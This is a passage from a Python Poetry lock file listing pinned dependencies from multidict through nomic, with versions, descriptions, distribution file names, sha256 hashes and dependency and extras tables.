"multidict-6.0.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b692f419760c0e65d060959df05f2a531945af31fda0c8a3b3195d4efd06de11"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:45e1ecb0379bfaab5eef059f50115b54571acfbe422a14f668fc8c27ba410e7e"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ddd3915998d93fbcd2566ddf9cf62cdb35c9e093075f862935573d265cf8f65d"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:59d43b61c59d82f2effb39a93c48b845efe23a3852d201ed2d24ba830d0b4cf2"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cc8e1d0c705233c5dd0c5e6460fbad7827d5d36f310a0fadfd45cc3029762258"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d6aa0418fcc838522256761b3415822626f866758ee0bc6632c9486b179d0b52"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:6748717bb10339c4760c1e63da040f5f29f5ed6e59d76daee30305894069a660"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:4d1a3d7ef5e96b1c9e92f973e43aa5e5b96c659c9bc3124acbbd81b0b9c8a951"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:4372381634485bec7e46718edc71528024fcdc6f835baefe517b34a33c731d60"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:fc35cb4676846ef752816d5be2193a1e8367b4c1397b74a565a9d0389c433a1d"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:4b9d9e4e2b37daddb5c23ea33a3417901fa7c7b3dee2d855f63ee67a0b21e5b1"}, {file = "multidict-6.0.4-cp38-cp38-win32.whl", hash = "sha256:e41b7e2b59679edfa309e8db64fdf22399eec4b0b24694e1b2104fb789207779"}, {file = "multidict-6.0.4-cp38-cp38-win_amd64.whl", hash = "sha256:d6c254ba6e45d8e72739281ebc46ea5eb5f101234f3ce171f0e9f5cc86991480"}, {file = "multidict-6.0.4-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:16ab77bbeb596e14212e7bab8429f24c1579234a3a462105cda4a66904998664"}, {file = "multidict-6.0.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:bc779e9e6f7fda81b3f9aa58e3a6091d49ad528b11ed19f6621408806204ad35"}, {file = "multidict-6.0.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:4ceef517eca3e03c1cceb22030a3e39cb399ac86bff4e426d4fc6ae49052cc60"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:281af09f488903fde97923c7744bb001a9b23b039a909460d0f14edc7bf59706"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:52f2dffc8acaba9a2f27174c41c9e57f60b907bb9f096b36b1a1f3be71c6284d"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b41156839806aecb3641f3208c0dafd3ac7775b9c4c422d82ee2a45c34ba81ca"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d5e3fc56f88cc98ef8139255cf8cd63eb2c586531e43310ff859d6bb3a6b51f1"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8316a77808c501004802f9beebde51c9f857054a0c871bd6da8280e718444449"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:f70b98cd94886b49d91170ef23ec5c0e8ebb6f242d734ed7ed677b24d50c82cf"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:bf6774e60d67a9efe02b3616fee22441d86fab4c6d335f9d2051d19d90a40063"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:e69924bfcdda39b722ef4d9aa762b2dd38e4632b3641b1d9a57ca9cd18f2f83a"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:6b181d8c23da913d4ff585afd1155a0e1194c0b50c54fcfe286f70cdaf2b7176"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:52509b5be062d9eafc8170e53026fbc54cf3b32759a23d07fd935fb04fc22d95"}, {file = "multidict-6.0.4-cp39-cp39-win32.whl", hash = "sha256:27c523fbfbdfd19c6867af7346332b62b586eed663887392cff78d614f9ec313"}, {file = "multidict-6.0.4-cp39-cp39-win_amd64.whl", hash = "sha256:33029f5734336aa0d4c0384525da0387ef89148dc7191aae00ca5fb23d7aafc2"}, {file = "multidict-6.0.4.tar.gz", hash = "sha256:3666906492efb76453c0e7b97f2cf459b0682e7402c0489a95484965dbc1da49"}, ] [[package]] name = "multiprocess" version = "0.70.15" description = "better multiprocessing and multithreading in Python" optional = true python-versions = ">=3.7" files = [ {file = "multiprocess-0.70.15-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:aa36c7ed16f508091438687fe9baa393a7a8e206731d321e443745e743a0d4e5"}, {file = "multiprocess-0.70.15-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:20e024018c46d0d1602024c613007ac948f9754659e3853b0aa705e83f6931d8"}, {file = "multiprocess-0.70.15-pp37-pypy37_pp73-manylinux_2_24_i686.whl", hash = "sha256:e576062981c91f0fe8a463c3d52506e598dfc51320a8dd8d78b987dfca91c5db"}, {file = "multiprocess-0.70.15-pp37-pypy37_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:e73f497e6696a0f5433ada2b3d599ae733b87a6e8b008e387c62ac9127add177"}, {file = "multiprocess-0.70.15-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:73db2e7b32dcc7f9b0f075c2ffa45c90b6729d3f1805f27e88534c8d321a1be5"}, {file = "multiprocess-0.70.15-pp38-pypy38_pp73-manylinux_2_24_i686.whl", hash = "sha256:4271647bd8a49c28ecd6eb56a7fdbd3c212c45529ad5303b40b3c65fc6928e5f"}, {file = "multiprocess-0.70.15-pp38-pypy38_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:cf981fb998d6ec3208cb14f0cf2e9e80216e834f5d51fd09ebc937c32b960902"}, {file = "multiprocess-0.70.15-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:18f9f2c7063346d1617bd1684fdcae8d33380ae96b99427260f562e1a1228b67"}, {file = "multiprocess-0.70.15-pp39-pypy39_pp73-manylinux_2_24_i686.whl", hash = "sha256:0eac53214d664c49a34695e5824872db4006b1a465edd7459a251809c3773370"}, {file = "multiprocess-0.70.15-pp39-pypy39_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:1a51dd34096db47fb21fa2b839e615b051d51b97af9a67afbcdaa67186b44883"}, {file = "multiprocess-0.70.15-py310-none-any.whl", hash = "sha256:7dd58e33235e83cf09d625e55cffd7b0f0eede7ee9223cdd666a87624f60c21a"}, {file = "multiprocess-0.70.15-py311-none-any.whl", hash = "sha256:134f89053d82c9ed3b73edd3a2531eb791e602d4f4156fc92a79259590bd9670"}, {file = "multiprocess-0.70.15-py37-none-any.whl", hash = "sha256:f7d4a1629bccb433114c3b4885f69eccc200994323c80f6feee73b0edc9199c5"}, {file = "multiprocess-0.70.15-py38-none-any.whl", hash = "sha256:bee9afba476c91f9ebee7beeee0601face9eff67d822e893f9a893725fbd6316"}, {file = "multiprocess-0.70.15-py39-none-any.whl", hash = "sha256:3e0953f5d52b4c76f1c973eaf8214554d146f2be5decb48e928e55c7a2d19338"}, {file = "multiprocess-0.70.15.tar.gz", hash = "sha256:f20eed3036c0ef477b07a4177cf7c1ba520d9a2677870a4f47fe026f0cd6787e"}, ] [package.dependencies] dill = ">=0.3.7" [[package]] name = "mwcli" version = "0.0.3" description = "Utilities for processing MediaWiki on the command line." optional = true python-versions = "*" files = [ {file = "mwcli-0.0.3-py2.py3-none-any.whl", hash = "sha256:24a7e53730e6fa7e55626e4f2a61a0b016d5e0a9798306c1d8c71bcead0ab239"}, {file = "mwcli-0.0.3.tar.gz", hash = "sha256:00331bd0ff16b5721c9c6274d91e25fd355f45ec0773c8a0e3926eac058719a0"}, ] [package.dependencies] docopt = "*" mwxml = "*" para = "*" [[package]] name = "mwparserfromhell" version = "0.6.5" description = "MWParserFromHell is a parser for MediaWiki wikicode." optional = true python-versions = ">= 3.7" files = [ {file = "mwparserfromhell-0.6.5-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:b3a941ea35fc4fb49fc8d9087490ee8d94e09fb8e08b3bca83fc99cb4577bb81"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a3b27580eebda2685ab5e54381df0845f13acb8ca7d50f754378184756e13bf"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6169f314d6c28f0f373b5b2b346c51058248c8897493ed7c490db7caa65ea729"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-win32.whl", hash = "sha256:b60e575e1e5c17a2e316b12a143de04665c4b1189a61a3a534967d33b57394cd"}, {file = "mwparserfromhell-0.6.5-cp310-cp310-win_amd64.whl", hash = "sha256:30747186171f6c58858c04eb617dd82dff2ae06d6f9e1b94714698daa32bc664"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:837e6adf0963ddf5317f789541ea109108515ccd2405cd1437ff8224294c3fa7"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3a3ba57207582de52345e69187218bd35cf3675497fd383bc70e46c0c728d50f"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7984215a21b0778b90724643df24e8dbb89aecb95af2ba56a42a1956fcbeb571"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-win32.whl", hash = "sha256:0c055324ad12c80f1ee2175c1d1b29b997aab57f6010174e704de15fdcb1757b"}, {file = "mwparserfromhell-0.6.5-cp311-cp311-win_amd64.whl", hash = "sha256:f252f09c4bf5432bd91a6aa79c707753ff084454cb24f8b513187531d5f6295f"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-macosx_11_0_x86_64.whl", hash = "sha256:61d1e01cc027fe3d94c7d3620cb6ea9648305795a66bb93747d418a15c0d1860"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4932d27cd3f00b451579c97c31e45d1e236b643bb93eeddde8d4aca50d87e3e6"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51e56993b7a351a44bdb9af7abbb72f3383fcb46f69e556f6116397598f6f3bb"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-win32.whl", hash = "sha256:eb1afb65e5b8a0e3eba35644347cd5304c6e7803571db042850dc0697bbe49a3"}, {file = "mwparserfromhell-0.6.5-cp37-cp37m-win_amd64.whl", hash = "sha256:05b8262dc13c83e023ea6d17e5e5bcef225c2c172621c71cad947958afbaf4e4"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:7408b3ce5f0b328e86be3809e906fc378767ef5396565b7411963452ad3bbf12"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1660c5558cd9a32b3e72c0e3aabdd6729a013d8e1b5695d4bdb478f691d9657e"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b205ce558596c35eacec863b3c88e9081872aa56b471ffd4f54162480d75f8d1"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-win32.whl", hash = "sha256:b09a62cac76ae0cb0daef309a93ecc23d3fbcd8e68a646517c6ac8479c4cc5fe"}, {file = "mwparserfromhell-0.6.5-cp38-cp38-win_amd64.whl", hash = "sha256:2ecc86c6b29354adb472553bf982b6bd05fd21ac41c44d454d2aac06ca456163"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:76234df2d138542ae839bebe53d4e4f59b286d0287101f54d1b84d9d193d5848"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5be5f476bf4077bfc6fefcb3ccb21900f63b36c09ef0bb63667e21f09be2198"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8b4d5e87d2b405eb493f86a3f0e513d4e2c30edde6b8d3b4f7d2a53ffac5d81a"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-win32.whl", hash = "sha256:7f6e5505014d0e97e29bc01304e8f6a8d782dec55c53492cc7ca03d2a6d1e445"}, {file = "mwparserfromhell-0.6.5-cp39-cp39-win_amd64.whl", hash = "sha256:153243177c4c242880e9c4547880e834f01d04625ad0bc175693255dfb22dae5"}, {file = "mwparserfromhell-0.6.5.tar.gz", hash = "sha256:2bad0bff614576399e4470d6400ba29c52d595682a4b8de642afbb5bebf4a346"}, ] [[package]] name = "mwtypes" version = "0.3.2" description = "A set of types for processing MediaWiki data." optional = true python-versions = "*" files = [ {file = "mwtypes-0.3.2-py2.py3-none-any.whl", hash = "sha256:d6f3cae90eea4c88bc260101c8a082fb0ab22cca88e7474657b28cd9538794f3"}, {file = "mwtypes-0.3.2.tar.gz", hash = "sha256:dc1176c5965629c123e859b319ae6151d4e385531e9a781604c0d4ca3434e399"}, ] [package.dependencies] jsonable = ">=0.3.0" [[package]] name = "mwxml" version = "0.3.3" description = "A set of utilities for processing MediaWiki XML dump data." optional = true python-versions = "*" files = [ {file = "mwxml-0.3.3-py2.py3-none-any.whl", hash = "sha256:9695848b8b6987b6f6addc2a8accba5b2bcbc543702598194e182b508ab568a9"}, {file = "mwxml-0.3.3.tar.gz", hash = "sha256:0848df0cf2e293718f554311acf4715bd679f639f4e52cbe47d8206589db1d31"}, ] [package.dependencies] jsonschema = ">=2.5.1" mwcli = ">=0.0.2" mwtypes = ">=0.3.0" para = ">=0.0.1" [[package]] name = "mypy" version = "0.991" description = "Optional static typing for Python" optional = false python-versions = ">=3.7" files = [ {file = "mypy-0.991-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:7d17e0a9707d0772f4a7b878f04b4fd11f6f5bcb9b3813975a9b13c9332153ab"}, {file = "mypy-0.991-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0714258640194d75677e86c786e80ccf294972cc76885d3ebbb560f11db0003d"}, {file = "mypy-0.991-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0c8f3be99e8a8bd403caa8c03be619544bc2c77a7093685dcf308c6b109426c6"}, {file = "mypy-0.991-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc9ec663ed6c8f15f4ae9d3c04c989b744436c16d26580eaa760ae9dd5d662eb"}, {file = "mypy-0.991-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4307270436fd7694b41f913eb09210faff27ea4979ecbcd849e57d2da2f65305"}, {file = "mypy-0.991-cp310-cp310-win_amd64.whl", hash = "sha256:901c2c269c616e6cb0998b33d4adbb4a6af0ac4ce5cd078afd7bc95830e62c1c"}, {file = "mypy-0.991-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d13674f3fb73805ba0c45eb6c0c3053d218aa1f7abead6e446d474529aafc372"}, {file = "mypy-0.991-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:1c8cd4fb70e8584ca1ed5805cbc7c017a3d1a29fb450621089ffed3e99d1857f"}, {file = "mypy-0.991-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:209ee89fbb0deed518605edddd234af80506aec932ad28d73c08f1400ef80a33"}, {file = "mypy-0.991-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:37bd02ebf9d10e05b00d71302d2c2e6ca333e6c2a8584a98c00e038db8121f05"}, {file = "mypy-0.991-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:26efb2fcc6b67e4d5a55561f39176821d2adf88f2745ddc72751b7890f3194ad"}, {file = "mypy-0.991-cp311-cp311-win_amd64.whl", hash = "sha256:3a700330b567114b673cf8ee7388e949f843b356a73b5ab22dd7cff4742a5297"}, {file = "mypy-0.991-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1f7d1a520373e2272b10796c3ff721ea1a0712288cafaa95931e66aa15798813"}, {file = "mypy-0.991-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:641411733b127c3e0dab94c45af15fea99e4468f99ac88b39efb1ad677da5711"}, {file = "mypy-0.991-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:3d80e36b7d7a9259b740be6d8d906221789b0d836201af4234093cae89ced0cd"}, {file = "mypy-0.991-cp37-cp37m-win_amd64.whl", hash = "sha256:e62ebaad93be3ad1a828a11e90f0e76f15449371ffeecca4a0a0b9adc99abcef"}, {file = "mypy-0.991-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:b86ce2c1866a748c0f6faca5232059f881cda6dda2a893b9a8373353cfe3715a"}, {file = "mypy-0.991-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ac6e503823143464538efda0e8e356d871557ef60ccd38f8824a4257acc18d93"}, {file = "mypy-0.991-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0cca5adf694af539aeaa6ac633a7afe9bbd760df9d31be55ab780b77ab5ae8bf"}, {file = "mypy-0.991-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a12c56bf73cdab116df96e4ff39610b92a348cc99a1307e1da3c3768bbb5b135"}, {file = "mypy-0.991-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:652b651d42f155033a1967739788c436491b577b6a44e4c39fb340d0ee7f0d70"}, {file = "mypy-0.991-cp38-cp38-win_amd64.whl", hash = "sha256:4175593dc25d9da12f7de8de873a33f9b2b8bdb4e827a7cae952e5b1a342e243"}, {file = "mypy-0.991-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:98e781cd35c0acf33eb0295e8b9c55cdbef64fcb35f6d3aa2186f289bed6e80d"}, {file = "mypy-0.991-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6d7464bac72a85cb3491c7e92b5b62f3dcccb8af26826257760a552a5e244aa5"}, {file = "mypy-0.991-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c9166b3f81a10cdf9b49f2d594b21b31adadb3d5e9db9b834866c3258b695be3"}, {file = "mypy-0.991-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8472f736a5bfb159a5e36740847808f6f5b659960115ff29c7cecec1741c648"}, {file = "mypy-0.991-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5e80e758243b97b618cdf22004beb09e8a2de1af481382e4d84bc52152d1c476"}, {file = "mypy-0.991-cp39-cp39-win_amd64.whl", hash = "sha256:74e259b5c19f70d35fcc1ad3d56499065c601dfe94ff67ae48b85596b9ec1461"}, {file = "mypy-0.991-py3-none-any.whl", hash = "sha256:de32edc9b0a7e67c2775e574cb061a537660e51210fbf6006b0b36ea695ae9bb"}, {file = "mypy-0.991.tar.gz", hash = "sha256:3c0165ba8f354a6d9881809ef29f1a9318a236a6d81c690094c5df32107bde06"}, ] [package.dependencies] mypy-extensions = ">=0.4.3" tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} typing-extensions = ">=3.10" [package.extras] dmypy = ["psutil (>=4.0)"] install-types = ["pip"] python2 = ["typed-ast (>=1.4.0,<2)"] reports = ["lxml"] [[package]] name = "mypy-extensions" version = "1.0.0" description = "Type system extensions for programs checked with the mypy type checker." optional = false python-versions = ">=3.5" files = [ {file = "mypy_extensions-1.0.0-py3-none-any.whl", hash = "sha256:4392f6c0eb8a5668a69e23d168ffa70f0be9ccfd32b5cc2d26a34ae5b844552d"}, {file = "mypy_extensions-1.0.0.tar.gz", hash = "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782"}, ] [[package]] name = "mypy-protobuf" version = "3.3.0" description = "Generate mypy stub files from protobuf specs" optional = false python-versions = ">=3.7" files = [ {file = "mypy-protobuf-3.3.0.tar.gz", hash = "sha256:24f3b0aecb06656e983f58e07c732a90577b9d7af3e1066fc2b663bbf0370248"}, {file = "mypy_protobuf-3.3.0-py3-none-any.whl", hash = "sha256:15604f6943b16c05db646903261e3b3e775cf7f7990b7c37b03d043a907b650d"}, ] [package.dependencies] protobuf = ">=3.19.4" types-protobuf = ">=3.19.12" [[package]] name = "nbclient" version = "0.8.0" description = "A client library for executing notebooks. Formerly nbconvert's ExecutePreprocessor." optional = false python-versions = ">=3.8.0" files = [ {file = "nbclient-0.8.0-py3-none-any.whl", hash = "sha256:25e861299e5303a0477568557c4045eccc7a34c17fc08e7959558707b9ebe548"}, {file = "nbclient-0.8.0.tar.gz", hash = "sha256:f9b179cd4b2d7bca965f900a2ebf0db4a12ebff2f36a711cb66861e4ae158e55"}, ] [package.dependencies] jupyter-client = ">=6.1.12" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" nbformat = ">=5.1" traitlets = ">=5.4" [package.extras] dev = ["pre-commit"] docs = ["autodoc-traits", "mock", "moto", "myst-parser", "nbclient[test]", "sphinx (>=1.7)", "sphinx-book-theme", "sphinxcontrib-spelling"] test = ["flaky", "ipykernel (>=6.19.3)", "ipython", "ipywidgets", "nbconvert (>=7.0.0)", "pytest (>=7.0)", "pytest-asyncio", "pytest-cov (>=4.0)", "testpath", "xmltodict"] [[package]] name = "nbconvert" version = "7.9.2" description = "Converting Jupyter Notebooks" optional = false python-versions = ">=3.8" files = [ {file = "nbconvert-7.9.2-py3-none-any.whl", hash = "sha256:39fe4b8bdd1b0104fdd86fc8a43a9077ba64c720bda4c6132690d917a0a154ee"}, {file = "nbconvert-7.9.2.tar.gz", hash = "sha256:e56cc7588acc4f93e2bb5a34ec69028e4941797b2bfaf6462f18a41d1cc258c9"}, ] [package.dependencies] beautifulsoup4 = "*" bleach = "!=5.0.0" defusedxml = "*" importlib-metadata = {version = ">=3.6", markers = "python_version < \"3.10\""} jinja2 = ">=3.0" jupyter-core = ">=4.7" jupyterlab-pygments = "*" markupsafe = ">=2.0" mistune = ">=2.0.3,<4" nbclient = ">=0.5.0" nbformat = ">=5.7" packaging = "*" pandocfilters = ">=1.4.1" pygments = ">=2.4.1" tinycss2 = "*" traitlets = ">=5.1" [package.extras] all = ["nbconvert[docs,qtpdf,serve,test,webpdf]"] docs = ["ipykernel", "ipython", "myst-parser", "nbsphinx (>=0.2.12)", "pydata-sphinx-theme", "sphinx (==5.0.2)", "sphinxcontrib-spelling"] qtpdf = ["nbconvert[qtpng]"] qtpng = ["pyqtwebengine (>=5.15)"] serve = ["tornado (>=6.1)"] test = ["flaky", "ipykernel", "ipywidgets (>=7)", "pytest", "pytest-dependency"] webpdf = ["playwright"] [[package]] name = "nbformat" version = "5.9.2" description = "The Jupyter Notebook format" optional = false python-versions = ">=3.8" files = [ {file = "nbformat-5.9.2-py3-none-any.whl", hash = "sha256:1c5172d786a41b82bcfd0c23f9e6b6f072e8fb49c39250219e4acfff1efe89e9"}, {file = "nbformat-5.9.2.tar.gz", hash = "sha256:5f98b5ba1997dff175e77e0c17d5c10a96eaed2cbd1de3533d1fc35d5e111192"}, ] [package.dependencies] fastjsonschema = "*" jsonschema = ">=2.6" jupyter-core = "*" traitlets = ">=5.1" [package.extras] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"] test = ["pep440", "pre-commit", "pytest", "testpath"] [[package]] name = "nebula3-python" version = "3.4.0" description = "Python client for NebulaGraph V3.4" optional = true python-versions = "*" files = [ {file = "nebula3-python-3.4.0.tar.gz", hash = "sha256:47bd8b1b4bb2c2f0e5122bc147926cb50578a66841acf6a743cae4d0362c9eaa"}, {file = "nebula3_python-3.4.0-py3-none-any.whl", hash = "sha256:d9d94c6a41712875e6ec866907de0789057f860e64f547f87d9f199439759dd6"}, ] [package.dependencies] future = ">=0.18.0" httplib2 = ">=0.20.0" pytz = ">=2021.1" six = ">=1.16.0" [[package]] name = "neo4j" version = "5.14.0" description = "Neo4j Bolt driver for Python" optional = true python-versions = ">=3.7" files = [ {file = "neo4j-5.14.0.tar.gz", hash = "sha256:6040efca47126c01385f09e550fb7d7671b1853a1e1c34908aa3713cebd285da"}, ] [package.dependencies] pytz = "*" [package.extras] numpy = ["numpy (>=1.7.0,<2.0.0)"] pandas = ["numpy (>=1.7.0,<2.0.0)", "pandas (>=1.1.0,<3.0.0)"] pyarrow = ["pyarrow (>=1.0.0)"] [[package]] name = "nest-asyncio" version = "1.5.8" description = "Patch asyncio to allow nested event loops" optional = false python-versions = ">=3.5" files = [ {file = "nest_asyncio-1.5.8-py3-none-any.whl", hash = "sha256:accda7a339a70599cb08f9dd09a67e0c2ef8d8d6f4c07f96ab203f2ae254e48d"}, {file = "nest_asyncio-1.5.8.tar.gz", hash = "sha256:25aa2ca0d2a5b5531956b9e273b45cf664cae2b145101d73b86b199978d48fdb"}, ] [[package]] name = "networkx" version = "3.1" description = "Python package for creating and manipulating graphs and networks" optional = true python-versions = ">=3.8" files = [ {file = "networkx-3.1-py3-none-any.whl", hash = "sha256:4f33f68cb2afcf86f28a45f43efc27a9386b535d567d2127f8f61d51dec58d36"}, {file = "networkx-3.1.tar.gz", hash = "sha256:de346335408f84de0eada6ff9fafafff9bcda11f0a0dfaa931133debb146ab61"}, ] [package.extras] default = ["matplotlib (>=3.4)", "numpy (>=1.20)", "pandas (>=1.3)", "scipy (>=1.8)"] developer = ["mypy (>=1.1)", "pre-commit (>=3.2)"] doc = ["nb2plots (>=0.6)", "numpydoc (>=1.5)", "pillow (>=9.4)", "pydata-sphinx-theme (>=0.13)", "sphinx (>=6.1)", "sphinx-gallery (>=0.12)", "texext (>=0.6.7)"] extra = ["lxml (>=4.6)", "pydot (>=1.4.2)", "pygraphviz (>=1.10)", "sympy (>=1.10)"] test = ["codecov (>=2.1)", "pytest (>=7.2)", "pytest-cov (>=4.0)"] [[package]] name = "newspaper3k" version = "0.2.8" description = "Simplified python article discovery & extraction." optional = true python-versions = "*" files = [ {file = "newspaper3k-0.2.8-py3-none-any.whl", hash = "sha256:44a864222633d3081113d1030615991c3dbba87239f6bbf59d91240f71a22e3e"}, {file = "newspaper3k-0.2.8.tar.gz", hash = "sha256:9f1bd3e1fb48f400c715abf875cc7b0a67b7ddcd87f50c9aeeb8fcbbbd9004fb"}, ] [package.dependencies] beautifulsoup4 = ">=4.4.1" cssselect = ">=0.9.2" feedfinder2 = ">=0.0.4" feedparser = ">=5.2.1" jieba3k = ">=0.35.1" lxml = ">=3.6.0" nltk = ">=3.2.1" Pillow = ">=3.3.0" python-dateutil = ">=2.5.3" PyYAML = ">=3.11" requests = ">=2.10.0" tinysegmenter = "0.3" tldextract = ">=2.0.1" [[package]] name = "nlpcloud" version = "1.1.44" description = "Python client for the NLP Cloud API" optional = true python-versions = "*" files = [ {file = "nlpcloud-1.1.44-py3-none-any.whl", hash = "sha256:ca05fe9d6bd7def583b4202b63ca423234c5b921e2ced5a20e9a0020619dc4c5"}, {file = "nlpcloud-1.1.44.tar.gz", hash = "sha256:74e5bf33d1492620a28b8fa5649e8f8366c0752a6e978251b7361d23b56025b3"}, ] [package.dependencies] requests = "*" [[package]] name = "nltk" version = "3.8.1" description = "Natural Language Toolkit" optional = true python-versions = ">=3.7" files = [ {file = "nltk-3.8.1-py3-none-any.whl", hash = "sha256:fd5c9109f976fa86bcadba8f91e47f5e9293bd034474752e92a520f81c93dda5"}, {file = "nltk-3.8.1.zip", hash = "sha256:1834da3d0682cba4f2cede2f9aad6b0fafb6461ba451db0efb6f9c39798d64d3"}, ] [package.dependencies] click = "*" joblib = "*" regex = ">=2021.8.3" tqdm = "*" [package.extras] all = ["matplotlib", "numpy", "pyparsing", "python-crfsuite", "requests", "scikit-learn", "scipy", "twython"] corenlp = ["requests"] machine-learning = ["numpy", "python-crfsuite", "scikit-learn", "scipy"] plot = ["matplotlib"] tgrep = ["pyparsing"] twitter = ["twython"] [[package]] name = "nomic" version = "1.1.14" description = "The offical Nomic python client." optional = true python-versions = "*" files = [ {file = "nomic-1.1.14.tar.gz", hash = "sha256:7980516131a125988cea47d7390063d90a9f5bdc6d6063574b6bfbb9897a7202"}, ] [package.dependencies] click = "*" cohere = "*" jsonlines = "*" loguru = "*" numpy = "*" pyarrow = "*" pydantic = "*" requests = "*" rich = "*" tqdm = "*" wonderwords = 